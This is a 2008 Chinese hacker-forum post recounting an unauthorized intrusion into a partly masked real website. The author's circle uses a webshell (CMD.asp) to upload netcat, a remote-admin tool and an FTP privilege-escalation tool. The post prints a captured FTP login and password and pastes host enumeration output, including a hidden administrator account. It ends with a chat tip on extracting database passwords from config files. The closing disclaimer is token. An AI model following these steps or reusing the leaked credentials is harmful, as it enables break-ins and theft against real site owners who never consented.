[图文]对一个怪网站的渗透记

作者：Ink 文章来源：网络采集点击数：更新时间：2008-5-9

希望各位只借鉴思路不是叫你去破坏.在脑袋里锻炼入侵我想没人会抓你的.
感谢下雨天发给嘿嘿大家别告诉他我发的啊
没经过他同意就发了其实感觉思路不错就扔给大家看看
高手就可以省过去拉
下雨天希望你看到了不要 K 我啊

对一个怪网站的渗透记录

我的好朋友木鱼黑了这个站，倒，后来给我玩，说提权限，呵呵！
http://www.XXXX.com/51.asp
maomao
www.xxxxx.com [202.109.xx.216] 有防火墙

下一个FLASHFXP 战果
FTP:202.109.xx.199
USER:web10461
PS：SKYYKF752

C:\rad.exe (351390) => /WINNT/system32/rad.exe 成功!
上传完毕！要刷新才能看到效果！

C:\桌面\ttt\nc\nc.exe (19488) => /WINNT/system32/nc.exe 成功!
上传完毕！要刷新才能看到效果！

我下了他一个4899的控制文件，我想呵呵，捆绑一下一个批处理或脚本什么来的哈哈！

FTP服务，倒，还玩迷惑，呵，我直接看了是5.004的版本，呵用动鲨的本地权限提升算了！

D:\Documents and Settings\xysky\桌面\网站作战\dsftp\sportshark.ini (42) => C:/Documents and Settings/All Users/Documents/My Faxes/sportshark.ini 成功!
上传完毕！要刷新才能看到效果！

D:\Documents and Settings\xysky\桌面\网站作战\dsftp\sportshark.exe (28672) => C:/Documents and Settings/All Users/Documents/My Faxes/sportshark.exe 成功!
上传完毕！要刷新才能看到效果！

呵呵，不太成呀

D:\WINNT>ftp
ftp> opne 202.109.xx.216 1985
Invalid command.
ftp>

倒，原来这个本来就可以直接执行了，晕死，可能是防火的太强了哈！！
已经启动以下 Windows 2000 服务:

   Apache Tomcat 4.1
   Automatic Updates
   Background Intelligent Transfer Service
   COM+ Event System
   Computer Browser
   DefWatch
   Distributed File System
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   DNS Server
   EasyMail NT Service
   Event Log
   IIS Admin Service
   IPSEC Policy Agent
   License Logging Service
   Logical Disk Manager
   NT LM SecurITy Support Provider
   Plug and Play
   Print Spooler
   Protected Storage
   Remote Access Connection Manager
   Remote Administrator Service
   Remote Procedure Call (RPC)
   Removable Storage
   RunAs Service
   SecurITy Accounts Manager
   Serv-U FTP Server
   Server
   Sygate Personal Firewall Pro
   Symantec AntiVirus Client
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper Service
   Telephony
   Terminal Services
   Windows Management Instrumentation
   Windows Management Instrumentation Driver Extensions
   Workstation
   World Wide Web Publishing Service

命令成功完成。

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
1
Administrator
NetShowServices
TsInternetUser
xysky$
命令成功完成。

TCP    0.0.0.0:1098           0.0.0.0:0              LISTENING
我兄弟的RAD 成功，怎么连不上
TCP    0.0.0.0:1984           0.0.0.0:0              LISTENING
这也是呀，倒不可能两个一起运行，难道是两台机！
TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
上面好多人连25 是个邮件服务器呵
TCP    202.109.xx.216:1080    202.109.xx.199:1433    ESTABLISHED
好怪

Windows 2000 IP Configuration

     Host Name . . . . . . . . . . . . : cw3
     Primary DNS Suffix  . . . . . . . : shhero.com
     Node Type . . . . . . . . . . . . : Broadcast

     IP Routing Enabled. . . . . . . . : No

     WINS Proxy Enabled. . . . . . . . : No

     DNS Suffix Search List. . . . . . : shhero.com

Ethernet adapter 本地连接:

     Connection-specific DNS Suffix  . :
     Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter
     Physical Address. . . . . . . . . : 00-0C-76-7D-FD-18

     DHCP Enabled. . . . . . . . . . . : No

     IP Address. . . . . . . . . . . . : 202.109.xx.200

     Subnet Mask . . . . . . . . . . . : 255.255.255.224

     IP Address. . . . . . . . . . . . : 202.109.xx.216

     Subnet Mask . . . . . . . . . . . : 255.255.255.224

     Default Gateway . . . . . . . . . : 202.109.xx.193

     DNS Servers . . . . . . . . . . . : 202.96.209.5
                                         202.96.209.133

驱动器 C 中的卷没有标签。
卷的序列号是 4C50-D081

C:\WINNT\system32 的目录

2004-10-16  07:31                 .
2004-10-16  07:31                 ..
2003-12-18  12:27                  304 $winnt$.inf
1900-10-29  04:00                2,151 12520437.cpx
1900-10-29  04:00                2,233 12520850.cpx
1900-10-29  04:00               32,016 aaaamon.dll
1900-10-29  04:00               67,344 access.cpl
2002-08-29  09:25               64,512 acctres.dll
2003-06-19  12:05              150,800 accwiz.exe
1900-10-29  04:00               61,952 acelpdec.ax

type c:\boot.ini
[boot loader]
timeout=1
default=multi(0)disk(0)rdisk(0)partITion(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partITion(1)\WINNT="Microsoft Windows 2000 Advanced Server" /fastdetect

C:\port\fport.exe (114688) => /WINNT/system32/fport.exe 成功!
上传完毕！要刷新才能看到效果！

dir fport.exe /s

驱动器 C 中的卷没有标签。
卷的序列号是 4C50-D081
差点没晕死，我还以为管理员什么限制都没呵呵
202.109.XX.198  202.109.xx.216 我下载了一个LOG文件，发现这两个IP 倒，呵！

发现网络真是越来越复杂了，想渗透，呵呵！

发现上传的动鲨的东西在这里，说明这个文件夹可以用来提升权限呵呵！
C:\port\fport.exe (114688) => /Documents and Settings/All Users/Documents/My Faxes/fport.exe 成功!
上传完毕！要刷新才能看到效果！

晕，再发现我用命令可以进C:\WINNT\system32 的目录就是进不了这个 /Documents and Settings
再退出来用CD\也不行，还是在C:\WINNT\system32下，倒！
以上都是用CMD.asp来的
下面用SQL试一下吧，晕
C:\Documents and Settings\All Users\Documents\DrWatson-----0
C:\Documents and Settings\All Users\Documents\My Music-----0
怪了，另一个文件夹怎么没显示呢？呵，是不是隐藏了！
扫了一下不行，倒了！显示主机为0，是不是真的呀！扫他周围算了
某某蛋说是两个CPU ，我以为是两个网卡呢！！

补充一下：
看到一些人直接得到webshell后找一些关键的文件来得到进一步的信息如SA的密码之类的，一般有哪类的文件
某某蛋...  13:55:59
一般是asa的  然后使用include插入到相关页面建立recordset连接
下雪天 13:47:00
这个网站是我兄弟黑的哈
下雪天 13:47:11
恩，我记下了
某某蛋...  13:56:30
哦  我加入你们吧  大家互相学习啊

某某蛋-是我隐藏的因为不知道他愿意不愿意把名字留下所以就暂时叫某某蛋把呵呵对不起了啊兄弟委屈你了。

文章录入：Ink 责任编辑：Ink

上一篇文章：一次渗透过程中的简单任务

下一篇文章：网络渗透测试无法告诉你的东西

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】